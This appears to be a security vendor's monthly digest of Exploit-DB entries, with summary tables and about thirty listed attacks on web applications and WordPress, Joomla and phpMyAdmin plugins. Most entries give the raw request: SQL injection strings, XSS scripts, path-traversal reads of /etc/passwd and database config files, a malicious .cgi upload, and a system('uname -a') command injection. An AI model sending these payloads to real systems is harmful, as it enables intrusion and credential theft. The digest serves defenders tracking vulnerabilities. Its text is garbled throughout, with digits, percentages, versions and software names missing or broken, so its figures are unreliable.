Analysis Summary (Author: Penta Security Systems, Security Evaluation Team)

EDB Analysis Report (06.07) 06.07.0~06.07.3
Information classified by vulnerability, from the exploits published on Exploit-DB (http://exploit-db.com).

According to the analysis of the Exploit-DB entries published in July 06, Cross Site Scripting had the largest number of reported vulnerabilities, and a wide variety of attack patterns were found. Most of these were not generic Cross Site Scripting vulnerabilities but vulnerabilities that occur only in specific programs.

Looking at the breakdown by major software, the largest number of vulnerabilities was found in [software name missing in the source]. (* Most of the vulnerabilities found in that software are not problems in the software itself but vulnerabilities that can arise when specific plug-ins are used.) These vulnerabilities took the form of injection into a parameter value, together with vulnerabilities that target specific headers. Administrators who use the affected programs and plug-ins need to check for updates and apply them promptly.

1. Number of reports by vulnerability type (blank cells are missing in the source)
   Vulnerability        Reports
   Command Injection
   Code Injection
   File Upload
   LFI                  3
   SQL Injection        9
   XSS                  5
   Total                30

2. Classification by risk level
   Risk level   Reports   Percentage
   High                   6.67%
   Medium       8         93.33%
   Total        30        00.00%

3. Breakdown by attack difficulty
   Difficulty   Reports   Percentage
   High                   6.67%
   Medium       7         3.33%
   Low                    70.00%
   Total        30        00.00%

4. Vulnerabilities by major software (total: 30)
   Report counts shown in the source: 5, 5, 5, 3 (the corresponding software names are missing in the source).
   Other software listed (their report counts are missing in the source): IPS Community Suite, CodoForum, Tiki Wiki, PaKnPost, Django, PhpMyAdmin, PHP File Vault, Joomla, php Real Estate Script, Streamo.
EDB Analysis Report (06.07) 06.07.0~06.07.3
Information classified by vulnerability, from the exploits published on Exploit-DB (http://exploit-db.com).
Each entry below lists: date, EDB ID, vulnerability type, attack difficulty / risk level, title, affected software, and the request or payload as published. Digits and names that are missing in the source are left as they appear.

06-07-04  EDB 40058  SQL Injection  Difficulty: Low / Risk: Medium
  Title: 0.5 - index.php SQL Injection vulnerability
  Software: 0.5 (name garbled in source)
  Request:
    /ecardmaxdemo/admin/index.php?step=admin_show_keyword&what=&row_number=0%0order%0by%0--&search_year=06&page=

06-07-06  EDB 4006  SQL Injection  Difficulty: Medium / Risk: Medium
  Title: Billing System ().9.6 - aomanage.php SQL Injection vulnerability
  Software: Billing System ().9.
  Request:
    /admin/aomanage.php?search=&cat=status%0union%0select%0,,3,version%8%9,5,current_user,7,8,9,0,,,3,4,5,6,7,8,9,0,--&list=3&so=status'

06-07-04  EDB 4005  SQL Injection  Difficulty: High / Risk: High
  Title: Photostore 4.7.5 - /photostore/gallery/objects/4/page/ SQL Injection vulnerability
  Software: Photostore 4.7.5
  Request:
    POST / HTTP/.
    User-Agent fragment: Chrome/6.0.9.75 Safari/535.7
  Body:
    postgalleryform=&gallerysortby=media_id&gallerysorttype=asc,(select 973 FROM(SELECT COUNT(*),CONCAT(0x776b6b7,(SELECT (ELT(973=973,))),0x778777,FLOOR(RAND(0)*))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

06-07-04  EDB 40058  XSS  Difficulty: Low / Risk: Medium
  Title: 0.5 - index.php XSS vulnerability
  Software: 0.5 (name garbled in source)
  Request:
    /ecardmaxdemo/admin/index.php?step=admin_member_display&search_field=all&keyword=%3cscript%3ealert()%3C%Fscript%3E&cmd_button=Search+User

06-07-04  EDB 4005  XSS  Difficulty: Low / Risk: Medium
  Title: Photostore 4.7.5 - workbox.php XSS vulnerability
  Software: Photostore 4.7.5
  Request:
    /photostore/workbox.php?mode=addtolightbox&mediaid= ><script>alert(/xss/)</script>

06-07-04  EDB 4005  XSS  Difficulty: Low / Risk: Medium
  Title: Photostore 4.7.5 - mgr.login.php XSS vulnerability
  Software: Photostore 4.7.5
  Request:
    /photostore/manager/mgr.login.php?username=demo&password='><script>alert("xss")</script><input type='hidden

06-07-06  EDB 4006  SQL Injection  Difficulty: Medium / Risk: Medium
  Title: Billing System ().9.6 - hostingarchiveadmin.php SQL Injection vulnerability
  Software: Billing System ().9.
  Request:
    # /admin/hostingarchiveadmin.php?search=&cat=status UNION select --&list=&so=status'

06-07-06  EDB 40063  File Upload  Difficulty: Low / Risk: Medium
  Title: PaKnPost Pro.4 - select_.cgi File Upload vulnerability
  Software: PaKnPost (PaKnPost Pro.4)
  Request:
    POST /cgi-bin/pnp/select_.cgi?sid=../../../cgi-bin/ HTTP/.
    Connection: Close
    Accept: text/html, application/xhtml+xml, */*
    Accept-Language: ko-kr
    User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0)
    Content-Type: multipart/form-data; boundary=---------------------------7dd009908f

    -----------------------------7dd009908f
    Content-Disposition: form-data; name="file"; filename="pnp-test.txt.cgi"
    Content-Type: application/octet-stream

    -----------------------------7dd009908f--

06-07-06  EDB 4006  XSS  Difficulty: Medium / Risk: Medium
  Title: Billing System ().9.6 - cmanage.php XSS vulnerability
  Software: Billing System ().9.
  Request:
    POST /admin/cmanage.php HTTP/.
    User-Agent fragment: Chrome/6.0.9.75 Safari/535.7
  Body:
    reason=%%3e%3cscript%3ealert%8%9%3c%fscript%3e

06-07-06  EDB 4006  XSS  Difficulty: Medium / Risk: Medium
  Title: Billing System ().9.6 - helpdesk.php XSS vulnerability
  Software: Billing System ().9.
  Request:
    POST /admin/helpdesk.php HTTP/.
    User-Agent fragment: Chrome/6.0.9.75 Safari/535.7
  Body:
    hd_name="><script>alert()</script>

06-07-06  EDB 4006  XSS  Difficulty: Medium / Risk: Medium
  Title: Billing System ().9.6 - omanage.php XSS vulnerability
  Software: Billing System ().9.
  Request:
    /omanage.php?search=%%3e%3cscript%3ealert%83%9%3C/script%3E&cat=status%%3E%3Cscript%3Ealert%84%9%3C/script%3E&list=4%%3E%3Cscript%3ealert%8%9%3c/script%3e&so=status%%3E%3Cscript%3Ealert%8%9%3C/script%3E

06-07-06  EDB 40065  XSS  Difficulty: Low / Risk: Medium
  Title: 3.0. - 4.0. - serverserver-settings.jsp XSS vulnerability
  Software: 3.0. < 4.0. (name missing in source)
  Request:
    POST /serverserver-settings.jsp HTTP/.
    User-Agent fragment: Chrome/6.0.9.75 Safari/535.7
  Body:
    domain=%%f%3e%3cscript%3ealert%8%7xss%7%9%3C%Fscript%3E&remotePort=569&serverAllowed=add+server

06-07-06  EDB 40065  XSS  Difficulty: Low / Risk: Medium
  Title: 3.0. - 4.0. - advance-user-search.jsp XSS vulnerability
  Software: 3.0. < 4.0. (name missing in source)
  Request:
    /plugins/search/advance-usersearch.jsp?search=true&moreoptions=false&criteria=admin%/%3e%3cscript%3ealert%8%7xss%7%9%3C/script%3E&search=Search

06-07-06  EDB 40065  XSS  Difficulty: Low / Risk: Medium
  Title: 3.0. - 4.0. - mucservice-edit-form.jsp XSS vulnerability
  Software: 3.0. < 4.0. (name missing in source)
  Request:
    POST /muc-service-edit-form.jsp HTTP/.
    User-Agent fragment: Chrome/6.0.9.75 Safari/535.7
  Body:
    save=true&mucname=test&mucdesc=test%%f%3e%3Cscript%3Ealert%8%7XSS-%7%9%3C%Fscript%3E

06-07-06  EDB 40065  XSS  Difficulty: Low / Risk: Medium
  Title: 3.0. - 4.0. - searchprops-edit-form.jsp XSS vulnerability
  Software: 3.0. < 4.0. (name missing in source)
  Request:
    POST /plugins/search/search-props-edit-form.jsp HTTP/.
    User-Agent fragment: Chrome/6.0.9.75 Safari/535.7
  Body:
    searchenabled=true&searchname=%/%3e%3cscript%3Ealert('XSS')%3C/script%3E&groupOnly=false

06-07-06  EDB 40065  XSS  Difficulty: Low / Risk: Medium
  Title: 3.0. - 4.0. - groupsummary.jsp XSS vulnerability
  Software: 3.0. < 4.0. (name missing in source)
  Request:
    /groupsummary.jsp?search=test%+onmouseover%3dalert%8%7XSS%7%9+x%3D%

06-07-04  EDB 40055  XSS  Difficulty: Low / Risk: Medium
  Title: Real3D FlipBook Plugin - flipbooks.php XSS vulnerability
  Software: Real3D FlipBook Plugin
  Request:
    POST /wp-content/plugins/real3dflipbook/includes/flipbooks.php HTTP/.
    User-Agent fragment: Chrome/6.0.9.75 Safari/535.7
  Body:
    action=delete&bookid=<script>alert(/makman/)</script>

06-07-08  EDB 40078  SQL Injection  Difficulty: High / Risk: Medium
  Title: Streamo Online Radio And TV Streaming CMS - programs.php SQL Injection vulnerability
  Software: Streamo (Streamo Online Radio And TV Streaming CM)
  Request:
    /programs.php?id=999999.9%7%0union%0all%0select%0concat%80x7e%c0x7%cunhex%8hex%8cast%8database%8%9%0as%0char%9%9%9%C0x7%C0x7e%9%C0x330335343830303536%0and%0%7x%7%3D%7x

06-07-08  EDB 40076  LFI  Difficulty: Low / Risk: Medium
  Title: php Real Estate Script 3 - /admin/ajax_cms/get_template_content/ LFI vulnerability
  Software: php Real Estate Script (php Real Estate Script 3)
  Request:
    POST /admin/ajax_cms/get_template_content/ HTTP/.
    User-Agent fragment: Chrome/6.0.9.75 Safari/535.7
  Body:
    tpl=../../private/config/db.php

06-07-  EDB 4008  XSS  Difficulty: Low / Risk: Medium
  Title: All in One SEO Pack P (title truncated in source)
  Software: All in One SEO Pack Plugin.3.6.
  Request:
    GET / HTTP/.
    User-Agent: Abonti </pre><script>alert();</script>

06-07-  EDB 40080  LFI  Difficulty: Low / Risk: Medium
  Title: Tiki Wiki CMS 5.0 - flv_stream.php LFI vulnerability
  Software: Tiki Wiki (Tiki Wiki CMS 5.0)
  Request:
    /player/flv/flv_stream.php?file=../../../db/local.php&position=0

06-07-  EDB 40084  Code Injection  Difficulty: Low / Risk: Medium
  Title: IPS Community Suite 4...3 - in (title truncated in source)
  Software: IPS Community (IPS Community Suite 4...3)
  Request:
    /index.php?app=core&module=system&controller=content&do=find&content_class=cms\fields{}phpinfo();/*

06-07-  EDB 40083  XSS  Difficulty: Low / Risk: Medium
  Title: Activity Log Plugin.3
  Software: Activity Log Plugin.3.
  Request:
    POST /wp-login.php HTTP/.
    User-Agent fragment: Chrome/6.0.9.75 Safari/535.7
    X-Forwarded-For: <script>alert(document.cookie);</script>
  Body:
    log=wordpress&pwd=sdsdssdsdsd&wpsubmit=log+in&redirect_to=http%3a%f%f9.68.8.35%Fwp-admin%F&testcookie=

06-07-4  EDB 40  SQL Injection  Difficulty: Low / Risk: Medium
  Title: Joomla Guru Pro (com_guru) Component - index.php SQL Injection vulnerability
  Software: Joomla (Joomla Guru Pro (com_guru) Component)
  Request:
    /index.php?option=com_guru&view=gurupcategs&layout=view&itemid=%0and%0=--&lang=en

06-07-0  EDB 4037  SQL Injection  Difficulty: Medium / Risk: Medium
  Title: Video Player Plugin
  Software: Video Player Plugin.5.
  Request:
    POST /wp-admin/adminajax.php?action=spiderveideoplayerselectplaylist HTTP/.
    User-Agent fragment: Chrome/6.0.9.75 Safari/535.7
  Body:
    search_events_by_title=&page_number=0serch_or_not=&asc_or_desc=&order_by=(case WHEN (SELECT sleep(0)) = THEN id ELSE title END) ASC #&option=com_spider_video_player&task=select_playlist&boxchecked=0&filter_order_playlist=&filter_order_dir_playlist=

06-07-0  EDB 409  XSS  Difficulty: Low / Risk: Medium
  Title: Django CMS 3.3.0 - /en/admin/djangocms_snippet/snippet// XSS vulnerability
  Software: Django (Django CMS 3.3.0)
  Request:
    POST /index.php HTTP/.
    Content-Type: multipart/form-data; boundary=---------------------------7dd009908f

    -----------------------------7dd009908f
    Content-Disposition: form-data; name="to_field"

    id
    -----------------------------7dd009908f
    Content-Disposition: form-data; name="name"

    test <img src="x">%0%0>"<iframe src="a">%0<iframe> "><"<img src="x">%0%0>"<iframe src=a><script>alet();</script><iframe>
    -----------------------------7dd009908f--

06-07-5  EDB 4050  SQL Injection  Difficulty: Medium / Risk: Medium
  Title: CodoForum 3.. - index.php SQL Injection vulnerability
  Software: CodoForum (CodoForum 3..)
  Request:
    /forum/index.php?u=/user/profile/%0and%0(select%0*(IF((SELECT%0*%0FROM%0(SELECT%0CONCAT((MID((IFNULL(CAST(CURRENT_USER()%0AS%0CHAR),0x0)),,45))))s),%084467440737095560,%084467440737095560)))

06-07-6  EDB 4063  LFI  Difficulty: Low / Risk: Medium
  Title: PHP File Vault 0.9 - /htdocs/fileinfo.php LFI vulnerability
  Software: PHP File Vault (PHP File Vault 0.9)
  Request:
    /htdocs/fileinfo.php?sha=..%f..%f..%f..%f..%f..%Fetc%Fpasswd

06-07-9  EDB 4074  SQL Injection  Difficulty: Low / Risk: Medium
  Title: Ultimate Product Catalog 3.9.8 - (do_shortcode via ajax) Blind SQL Injection
  Software: Ultimate Product Catalog 3.9.8
  Request:
    POST /wordpress/wp-admin/adminajax.php?action=update_catalogue HTTP/.
    User-Agent fragment: Chrome/6.0.9.75 Safari/535.7
  Body:
    id=+or+sleep(0)+--+

06-07-9  EDB 4085  Command Injection  Difficulty: Low / Risk: High
  Title: PhpMyAdmin 4.6. - tbl_find_repl (title truncated in source)
  Software: PhpMyAdmin (PhpMyAdmin 4.6.)
  Request:
    POST /tbl_find_replace.php HTTP/.
    User-Agent fragment: Chrome/6.0.9.75 Safari/535.7
  Body:
    replacewith=system('uname -a');